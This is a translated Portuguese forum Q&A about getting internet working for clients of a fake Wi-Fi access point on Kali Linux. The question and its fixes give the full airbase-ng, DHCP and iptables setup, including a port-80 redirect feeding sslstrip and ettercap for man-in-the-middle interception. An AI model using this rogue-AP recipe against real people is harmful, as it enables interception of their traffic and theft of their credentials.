Internet para clientes AP falsos

Question

Internet para clientes AP falsos

#1 resposta do (2 votos)
#2 resposta do (0 votos)

1

Eu tenho tentado configurar um AP falso para fins de teste. Eu consegui obter airbase-ng funcionando e configurar um servidor DHCP para os clientes obterem o endereço IP, o que tudo funciona. Meu laptop tem um cartão de Wi-Fi externo para o AP e um interno para internet. No entanto, quando eu inicio o AP, os clientes (meu telefone) não podem realizar buscas no navegador da web e nem o meu laptop, mesmo que o laptop tenha uma segunda placa wifi que não esteja no modo monitor.

Aqui está minha configuração:

sudo ifconfig wlan1 down
sudo ifconfig wlan1 up
sudo airbase-ng -c 11 -e ANET wlan1



sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0
sudo ifconfig at0 mtu 1800
sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
sudo iptables -P FORWARD ACCEPT
sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sudo /etc/init.d/isc-dhcp-server start

ip_forwarding está ativado.

Isto é de um tutorial. Então eu corro sslstrip e ettercap.

Esta é a minha configuração de sub-rede DHCP

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0{
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "ANET";
option domain-name-servers 192.168.1.170;
range 192.168.1.2 192.168.1.40;
}

O comando dhcpd responde com:

Multiple interfaces match the same subnet: wlan0 wlan1
Multiple interfaces match the same shared network: wlan0 wlan1
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
Multiple interfaces match the same subnet: wlan0 wlan1
Multiple interfaces match the same shared network: wlan0 wlan1
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0

ettercap mostra o pedido de DHCP e ack do cliente:

DHCP: [192.168.1.1] OFFER : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [192.168.1.1] OFFER : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [C0:BD:D1:15:2B:64] REQUEST 192.168.1.2
DHCP: [192.168.1.1] ACK : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [192.168.1.1] ACK : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"

Meu endereço IP na wlan0 é 192.168.1.170.

Edições:

Configuração do DHCP:

        Authoritative;
    Default-lease-time 600;
    Max-lease-time 7200;
    Subnet 192.168.2.0 netmask 255.255.255.0{
    option routers 192.168.2.1;
    option subnet-mask 255.255.255.0;
    option domain-name "ANET";
    option domain-name-servers 192.168.1.170;
    range 192.168.2.2 192.168.2.40;
}

Iptables:

sudo ifconfig at0 192.168.2.1 netmask 255.255.255.0
sudo ifconfig at0 mtu 1800
sudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
sudo iptables -P FORWARD ACCEPT
sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sudo /etc/init.d/isc-dhcp-server start
sudo sslstrip -f -p -k 10000

networking wireless-access-point wireless-networking kali-linux

por dylan7 28.05.2015 / 20:13

2 respostas

0

Para corrigir isso. Eu segui a resposta de Spiff e tentei algumas outras coisas que fizeram com que funcionasse no final.

1) Eu mudei a sub-rede IP no arquivo de configuração do DHCP para 192.168.2.0/24 como Spiff disse para fazer.

2) Eu fiz o gateway no iptables e o option routers no arquivo de configuração do DHCP para 192.168.2.1

3) Última peça: alterei o DNS para o 8.8.8.8 do Google no arquivo de configuração do DHCP. Meu AP pode ter bloqueado a capacidade de usá-lo como DNS ... apenas um palpite

por 03.06.2015 / 03:13

Tags networking wireless-access-point wireless-networking kali-linux

BIOS não compatível com ACPI, na instalação do Windows 7 Como posso fixar / descomprimir uma versão / pacote de kernel específico no fedora 21?

score 2 · Accepted Answer

Você documentou dois problemas até agora:

Você tem a mesma sub-rede IP nos dois lados do seu laptop. Seu laptop está agindo como um gateway NAT, que é como um roteador IP em esteróides. Os roteadores IP precisam ter sub-redes diferentes em cada lado, caso contrário, não sabem como rotear as coisas.
Você configurou seu servidor DHCP para dizer aos clientes do seu softAP que usem seu laptop como servidor DNS, mas o laptop não está configurado para atuar como um servidor ou proxy DNS.

Você pode consertar isso alterando sua sub-rede para seus clientes softAP para 192.168.2.0/24, mas mantenha seu processo de servidor DHCP informando aos clientes para usar 192.168.1.1 como seu servidor DNS. Dessa forma, as solicitações DNS passarão pelo NAT do laptop para o gateway NAT de upstream, que provavelmente tem um serviço de proxy DNS em execução.